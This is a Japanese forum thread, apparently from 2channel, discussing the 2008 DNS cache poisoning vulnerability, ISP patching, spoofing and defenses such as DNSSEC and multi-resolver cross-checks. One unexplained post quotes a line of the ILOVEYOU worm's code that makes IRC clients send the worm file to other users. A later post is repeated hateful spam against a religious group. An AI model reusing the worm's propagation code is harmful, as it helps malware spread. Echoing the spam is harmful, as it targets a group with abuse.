管理外再帰の可能なDNSに限って言えば、国内の主要な所は更新されたようだね
大学も殆ど対応済み
CATVも殆ど対応済み
ただOCNの下にぶら下がる地方のプロバイダの更新が遅いね
お知らせコーナーを見ると更新が2007年代で止まってる所もあるし、こう言う所は危ないな
>>100 海外のBIND板だと対抗策も出てるけど、本家+第三者加工プログラムみたいな感じで導入が難しいな
Windows環境だと今の所完全防御は絶望的
でもさ、ポイズニングって送信元IPアドレスの
詐称ができないとだめなんでしょ?
ISPは出て行くパケットについてのチェックをしてないのかな。
>>102 その出て行くパケってのはサーバと言う意味で書いてるの?契約ユーザーいう意味で書いてるの?
管理者の手元にあるサーバからは改変されたパケなんて出ないからチェックする意味が無い
ユーザーからは改変されたパケが飛ぶかもしれないが、それが何を意味するか分からないのに止めたら大問題だ
都合、チェックをする意味が無い
チェックをしたとしても赤の他人のサーバにそれを信じろと言うのは無理だろ?
だからサーバは入ってくるパケの整合性を調べる努力をするしかない
104 :
名無しさん@お腹いっぱい。:2008/08/19(火) 01:44:53
で
結局被害は無しなのな
>>104 へ?被害でてるじゃん?
ネット系のニュースで一週間以上も前に見たぞ
いくつか出てたうちの一つはアフィリエイト目的のページに数千人単位で誘導するという豪快なんだか小悪党なんだか分からないやつだったけど
あれがウイルスバラマキじゃなかったから大騒ぎになってないだけ
106 :
名無しさん@お腹いっぱい。:2008/08/19(火) 21:43:40
>>105 それって誘導されただけで
被害って程じゃないジャン
振り込め詐欺ぐらいのはないの?
誘導に成功してるって事は、ルール無用の自前サーバで何でも出来るって事と同義だよ
あと、折角丁寧にネット上の足跡を消したのに、振り込め詐欺を行うと口座から何から全部残ってしまうから普通はしない
やるならカードの暗証蛮語を入力させる方式で、全世界の好きな所でお金をおろせる方を選ぶだろうね
因みにアフィリエイトに誘導しただけで、検索場を提供してる側には営業利益的に軽く数百万の被害が出ている
キャッシュをクリアした直後の効率低下も考えれば数字にならない阻害も大きい
勿論アフィリエイトを登録されていた側も詐欺的な手法で出来高払いを行わなければならないので、払っていたら被害金額として、払わなくても詐欺の被害を受けている事になる
エンドポイントである一ユーザーの被害は聞こえてこなくても、既に十分に被害が出てるよ
108 :
名無しさん@お腹いっぱい。:2008/08/20(水) 07:47:20
アフィリエイト提供側に被害って・・・・
誘導してくれてむしろありがとうだろうw
アフィリエイトは相手に悪い印象を与えたら商品のイメージが最悪になる
だから日本の普通のアフィリエイトは小さく邪魔せずページの内容に沿った物が表示される事が多い
検索から誘導されて飛んだページにアフィリだけ置いてあって、しかもページが怪しさ満点だったりするとアフィリまで怪しいと思われかねない
誰も飛ばないバナーなのに表示するだけで金が取られるってアフィリの会社からすると最悪だよ
>>109 おまえ、アフィリエイトの仕組み分かってないだろ?
商品の宣伝なんぞのためにアフィはそんざいしているのではないよ
正確には広告主の要望にしたがってサイトを運営してもらうために
金をばら撒いている、というのが本音
111 :
名無しさん@お腹いっぱい。:2008/08/22(金) 09:13:28
112 :
名無しさん@お腹いっぱい。:2008/08/22(金) 09:42:40
>>111 >被害事例はまだ報告されていないものの
113 :
名無しさん@お腹いっぱい。:2008/08/22(金) 09:44:16
cache poisoning自体はずいぶん昔から指摘されていた欠陥だしね今さらな感も
>>111 と
>>114 の内容は違うんじゃないのか?
>>111 のは"DNSサーバーに偽の住所情報を大量に送りつけると"ってあたりが一連のDNS Spoofingと違う気がする
>>114 のは例の"ポートが固定されていたら〜"から派生する内容だよね?
>>111 の具体的な方法はどんなものだろう?日経の記事は必要以上に丸められていてわからん
116 :
名無しさん@お腹いっぱい。:2008/08/22(金) 17:20:47
>>115 いやたぶん同じことを言おうとしているんだと思う
日本ネットワークインフォメーションセンターとやらが
この時期別の危険性を声高に叫ぶはずないでしょ
日経・・・日本のオンライン経済活動に疎いんじゃないのか
何にしてもあの記事の書き方は知識がある人が見ても謎な文章だから、そうじゃない人には尚更だっただろう
もしかしてネットワーク系の会社の株を操作したんじゃあるまいな〜
多分ちょっとは下がってるはずだし、場の雰囲気が悪化したと思うが
今、NHKでこれのニュースが有った。
「専用のプログラムを使用すれば対策出来る」とのこと。
被害例として、金融システムにアクセスしようとしたら、詐欺サイトうんぬん。
煽ってる割には、だからどうすんねん!というニュースでした。
>「専用のプログラムを使用すれば対策出来る」
なんと便利な解説>NHK
この言葉,いつでも使えそうだな(笑
121 :
名無しさん@お腹いっぱい。:2008/08/29(金) 18:53:12
これに絡んでエンタープライズウォッチで自社製品の売り込みしてる
おっさんの記事見て思ったんだけど、
自由度40億で破るのに10時間かかるなら、DNSのリクエストを2回送って
二つのレスポンスをクロスチェックするだけで、
自由度が1600京になって安全性を確保できるんじゃね?
そう言うのはBINDの有志が組んだものがあるけど、最初の名前解決に恐ろしい程時間がかかるよ
個人なら耐えられるけど、ISPでは耐えられないかも
あと、複数参照は攻撃された部位が上流の場合は同じ汚染情報を受け取ってしまうのも弱点
個人的にはDNSSECお勧め
問い合わせ二回だから時間が2倍になるってこと?
それ以上というニュアンスで受け取ったけど、なぜだろう・・・?
まずフォワード先は最低3カ所は必要
なぜなら二つではどちらかが汚染されてたとしても同数だから多数決で判断できなくなるから
フォワード先は上流の分かれた奇数カ所が望ましいとされている
日本の場合は外部からの再帰的問い合わせに答えるDNSサーバが80カ所以上あるので、これは何とかなる
フォワード先を増やすと、基本的には全ての解決が終了してからでないと汚染確認が始まらない
フォワード先のDNSサーバが名前解決を失敗したり、回線の都合で立ち消えになったりすると、タイムオーバーまで名前解決が停止する
一度キャッシュされた後は通常と同じ速度で再帰的問い合わせに答えるが、キャッシュ生存時間が過ぎれば再び同じ手順を経る事になる
多数のフォワード先を利用する都合、最も遅いDNSサーバの影響を大きく受ける
自分の上流のDNSサーバ以外を利用する為、今まで5〜10msで解決出来ていたものが20〜40ms掛かるようになり、更に汚染確認の処理が入る為50msを越える事が多くなる
>>124 分からないので教えてほしいのですが、
外部のフォワーダ3台以上使って各応答を検証する特殊な仕組みを作るより、
普通のフルサービスリゾルバ持って自力でルートから素直に辿るほうが
自然そうなんですけれど、それじゃ駄目?
>>125 124じゃないが答えてみる
その方法だと一部のサーバにすげぇ無理が行くし、フルサービスリゾルバって結局は他力本願なキャッシュサーバーだよな
そこに問い合わせる方法が安全でも中身が腐ってたら意味なさそう
あと124も分かってて端折ってるのかも知れんが直接攻撃でキャッシュ書き換えられたらどーしよーもない
多数のフォーワードに聞きに行く方法は自分は攻撃されないだろうという楽観的な対策のひとつに過ぎんよ
127 :
名無しさん@お腹いっぱい。:2008/09/01(月) 00:14:18
やっぱり根元的な対策はDNSSECしかないのでは
根本的な問題として,
IPにおける送信元アドレスの詐称は動揺もないのか?
動揺→どうしよう
技術的には可能だろうけど、主観時間的に不可能だし、予算的に不可能だし、フォーマット的に不可能だと思う
131 :
名無しさん@お腹いっぱい。:2008/09/05(金) 09:55:17
何か全然被害ないねえ
ハッカーどうしたの?
OCNだけどようやくGREATになった
135 :
名無しさん@お腹いっぱい。:2008/09/06(土) 11:45:10
ん? できたけど
ちなみにbiglobeだけどすべてGREATですた!
136 :
124:2008/09/06(土) 20:36:41
>>126 ごめんなさい、やっぱり分かりません。私が意図してたのは、
・各応答を検証する仕組みは、自宅 or 自サイトで持つサーバで作るのだろう(推測)
・その仕組みから、ヨソ(外部組織)の野良キャッシュサーバを多数使う?
・それなら自宅内で BIND でも何でもいいからあげて、ルート→jp→co.jpと順次辿る、
ルートサーバとオリジンサーバを信じる普通のやり方でいいのでは。
ということです。
検証のため(?)という理屈で知らない人からの再帰クエリーを送りつけられる、
ヨソのキャッシュサーバたちの方が「一部のサーバにすごい負荷」な状態に
あたるのではないかなと。
「直接攻撃でキャッシュ書き換えられたらどーしよーもない」には同感です。
外部組織からの再帰検索を受けつける甘いサーバより、自宅 BIND の方が信じられそう。
138 :
名無しさん@お腹いっぱい。:2008/09/17(水) 14:32:50
「攻撃トラフィック」発信源、ワースト1位は日本 | WIRED VISION
http://wiredvision.jp/news/200809/2008091122.html >攻撃トラフィックの発信源、すなわち「分散型サービス拒否」(DDoS)攻撃や、
>ハッキング行為、DNS(ドメイン・ネーム・システム)ハイジャックのトラフィ
>ックが特に多かったのは、日本[30.07%。前期の3.56%(7位)から急浮上した]、
>米国[21.52%]、中国[8.90%]、ドイツ [5.56%]だった。
139 :
名無しさん@お腹いっぱい。:2009/02/25(水) 11:54:41
140 :
名無しさん@お腹いっぱい。:2009/10/21(水) 14:06:16
誰か教えて下さい。
うちのサイトをグーグルのキャッシュで表示すると
全然別のドメインでクッキー許可のポーズ画面(プイバシーの警告)が表示されます。
(当サイトではそもそもクッキーは使用していません。)
詳細情報を見ると searchportal.information・・・何とかかんとかの文字が・・・
「searchportal.information」をグーグルで検索すると
DNSポイズニングsearchportal.information.comがやってきた! - SEO
http://www.search-seo.info/2008/11/dnssearchportalinformationcom.html DNSポイズニングってヤバイのでしょうか?
新種のアタッキングでしょうか? 対処方法はないでしょうか?
そもそも何故グーグルのキャッシュページにプライバシーの警告画面がでるんでしょうか?
誰か教えて下さい。
Scriptini.WriteLine "n2= /.dcc send $nick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
てst
とりあえず対策としてルータのDNSフォワードは使わず、OSのDNS設定にDNS Benchmark(GRC)で調べたエラーのなく高速なDNSアドレスを幾つか列記でおk?
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
145 :
名無しさん@お腹いっぱい。:2013/07/22(月) NY:AN:NY.AN
hosyu age
147 :
忍法帖【Lv=40,xxxPT】(1+0:8) :2014/04/15(火) 19:56:11.22
148 :
名無しさん@お腹いっぱい。:
DNSSEC Validation対応しているISPはどのくらいあるんだ?